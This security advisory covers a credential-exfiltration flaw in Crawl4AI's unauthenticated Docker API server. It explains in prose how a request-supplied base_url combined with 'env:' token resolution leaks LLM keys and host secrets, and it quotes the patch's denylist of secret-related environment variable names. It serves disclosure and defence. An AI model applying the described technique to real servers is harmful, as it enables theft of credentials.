Jun 16, 2026·6 min read·6 visits
Unauthenticated remote attackers can exfiltrate LLM API keys and sensitive environment variables from Crawl4AI Docker servers by exploiting request-supplied base_url redirects and env-token resolution.
A technical evaluation of the Crawl4AI open-source web crawling and scraping library revealed a high-severity credential exfiltration vulnerability in its self-hosted Dockerized API server. The flaw arises from an unvalidated base_url parameter in request payloads and a dynamic prefix resolution mechanism that retrieves system environment variables. Unauthenticated remote attackers can leverage these features in tandem to extract host-level secrets or redirect configured LLM API keys to an external listener under their control.
The Crawl4AI open-source web crawling and scraping library features a Dockerized API server to facilitate automated content extraction. This server provides several HTTP endpoints, including /md, /llm, and /llm/job, which allow clients to utilize Large Language Models (LLMs) via integrations such as LiteLLM. Users can supply parameters in their request bodies to customize behavior, configuring providers and formatting results dynamically.
A security analysis identified a structural design vulnerability in how these endpoints process LLM configuration parameters. Specifically, the application allows users to supply custom routing and credential retrieval parameters within standard HTTP request payloads. Because the Docker API server is unauthenticated by default, any network-adjacent or public-facing deployment of this service exposes these endpoints to unauthorized requests.
This structural exposure allows unauthenticated remote attackers to redirect API keys or retrieve local system secrets. The weakness is classified under CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-522 (Insufficiently Protected Credentials), and CWE-918 (Server-Side Request Forgery). The vulnerability is tracked as GHSA-f989-c77f-r2cq and is patched in version 0.8.8.
The core vulnerability resides in the combination of two features: unvalidated configuration overrides and dynamic environment variable resolution. First, the Docker API server accepted and prioritized user-supplied base_url parameters over locally configured API endpoints. This behavior allowed arbitrary redirection of outbound LLM requests while keeping the server-side API keys intact within the outbound request headers.
Second, the LLMConfig deserialization routine supported a prefix named env:. If a client specified "api_token": "env:VAR_NAME", the backend dynamically resolved this string using Python's os.getenv("VAR_NAME"). Because any client could pass these configuration parameters to endpoints without authentication, this mechanism created an arbitrary environment variable reader.
The combination of these two elements creates a multi-stage exploitation vector. An attacker can direct the application to request an environment variable containing a system secret, resolve its value, and route the resulting outbound payload directly to an attacker-controlled listener. Because the application processes these configurations on a per-request basis, the vulnerability requires no local file system access or persistent server modifications.
The vulnerability is addressed in Crawl4AI version 0.8.8. The code changes focus on restricting request-supplied URL configurations and implementing a denylist for environment variable resolution.
In deploy/docker/api.py, the original implementation prioritized the user-supplied base_url if present. The patch modified this behavior to completely ignore the request-supplied parameter, falling back strictly to the server-configured base URL:
# File: deploy/docker/api.py
# Original vulnerable lines:
# base_url=base_url or get_llm_base_url(config, resolved_provider),
# Patched line:
base_url=get_llm_base_url(config, resolved_provider), # ignore request base_url (key-exfil vector)In crawl4ai/async_configs.py, a new validation routine _is_forbidden_env_name was implemented. This function screens requested environment variables against exact matches, prefixes, and substrings associated with secrets before invoking os.getenv():
# File: crawl4ai/async_configs.py
_FORBIDDEN_ENV_SUBSTRINGS = ("SECRET", "PASSWORD", "PRIVATE", "PASSWD")
_FORBIDDEN_ENV_PREFIXES = ("CRAWL4AI", "AWS_SECRET")
_FORBIDDEN_ENV_EXACT = {"SECRET_KEY", "REDIS_PASSWORD", "TOKEN"}
def _is_forbidden_env_name(name: str) -> bool:
if not name:
return True
u = name.upper()
if u in _FORBIDDEN_ENV_EXACT:
return True
if any(s in u for s in _FORBIDDEN_ENV_SUBSTRINGS):
return True
if any(u.startswith(p) for p in _FORBIDDEN_ENV_PREFIXES):
return True
return FalseWhile this denylist mitigates the most immediate vectors (e.g., retrieving SECRET_KEY), it relies on a string-matching approach. If system administrators store credentials in non-matching variables (such as DATABASE_URL or API_KEY_VAL), those secrets remain accessible through env: resolution. Organizations must ensure that any sensitive keys do not fall outside the designated blocklist.
Exploitation of this vulnerability requires network access to the unauthenticated Crawl4AI Docker server endpoints. Since the server does not enforce authentication by default, any external entity can send a POST request containing a crafted JSON payload.
An attacker can capture configured LLM keys by directing the backend to route requests to an external server. By sending a request to /llm with the base_url set to an attacker-controlled endpoint, the server constructs the standard API call containing the legitimate, locally-configured provider API key in the authorization headers.
To extract general system secrets, the attacker combines both parameters. The attacker sets the api_token to "env:SECRET_KEY" and the base_url to their listening server. Upon parsing, the backend retrieves the host's JWT signing key and transmits it as the bearer token to the malicious destination.
The impact of successful exploitation is high confidentiality exposure. Attackers can completely compromise any upstream LLM API accounts (such as OpenAI, Anthropic, or Hugging Face) configured on the target system, potentially leading to unauthorized financial charges or data exposure.
Furthermore, the exfiltration of host-level environment variables extends the threat vector beyond simple LLM keys. Attackers can target system passwords, AWS credentials, session database keys, and JWT secrets, allowing them to escalate privileges or access adjacent backend databases.
Because the Docker server runs unauthenticated by default, this vulnerability is highly accessible to remote actors. The CVSS v3.1 score is evaluated at 8.2 (High), reflecting a high confidentiality impact and a low attack complexity.
The primary remediation is to upgrade the Crawl4AI package and Docker containers to version 0.8.8 or later. This release disables arbitrary base_url overrides from incoming API requests and restricts env: prefix resolution.
If immediate patching is not feasible, administrators must enable API token authentication by configuring the CRAWL4AI_API_TOKEN environment variable. This configuration ensures that only authorized entities can interact with the server endpoints, mitigating anonymous exploitation.
Additionally, network-level egress filtering should be configured on the hosting environment. Restricting the container's outbound network calls to specific, trusted upstream API domains (e.g., api.openai.com) prevents the redirection of requests to malicious external servers.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
crawl4ai unclecode | <= 0.8.7 | 0.8.8 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-200 / CWE-522 / CWE-918 |
| Attack Vector | Network (AV:N) |
| CVSS v3.1 | 8.2 (High) |
| Exploit Status | Proof of Concept / Functional |
| KEV Status | Not Listed |
| Primary Impact | Exfiltration of LLM API credentials and host environment variables |
The product exposes sensitive information to an actor who is not authorized to have access to that information.
An authenticated security-bypass vulnerability in n8n allows users with workflow creation or modification privileges to bypass the Python AST security validator. By circumventing AST validation logic, attackers can execute arbitrary statements, access the task executor's root module namespace, and disclose sensitive host environment variables on self-hosted instances.
An incorrect authorization vulnerability in the Public API of n8n allows authenticated users with read-only permissions to bypass access control boundaries. By invoking the execution retry endpoint, an unauthorized user can trigger workflow executions, effectively escalating their privileges from workflow:read to workflow:execute.
A low-severity Cross-Site Scripting (XSS) vulnerability in Nuxt's globally registered <NoScript> head component allows unauthenticated attackers to execute arbitrary JavaScript. By injecting dynamic, untrusted data into <NoScript> slots, standard Vue HTML escaping is bypassed because the component processes slot text nodes and assigns them directly to the target element's innerHTML property instead of textContent. In modern browsers with scripting enabled, this raw injection can implicitly close the <noscript> tag, triggering script execution.
CVE-2026-49993 identifies an incomplete same-origin check validation mechanism in @nuxt/webpack-builder and @nuxt/rspack-builder dev server middleware. When the local development server is bound to a non-loopback address, cross-origin attackers can bypass verification checks by suppressing browser headers, leading to unauthorized retrieval and exfiltration of compiled source code chunks.
An OS command injection vulnerability in yt-dlp before 2026.06.09 allows unauthenticated remote attackers to execute arbitrary shell commands via crafted media metadata when a user processes media using the --exec post-processing parameter with unsafe string interpolation conversions.
An in-depth technical analysis of multiple security vulnerabilities in the self-hosted Docker API server of Crawl4AI up to version 0.8.7. These flaws include a critical arbitrary file write via symlink traversal and TOCTOU weakness, CRLF log injection, webhook header injection, and SSRF filter gaps. These have been remediated in version 0.8.8.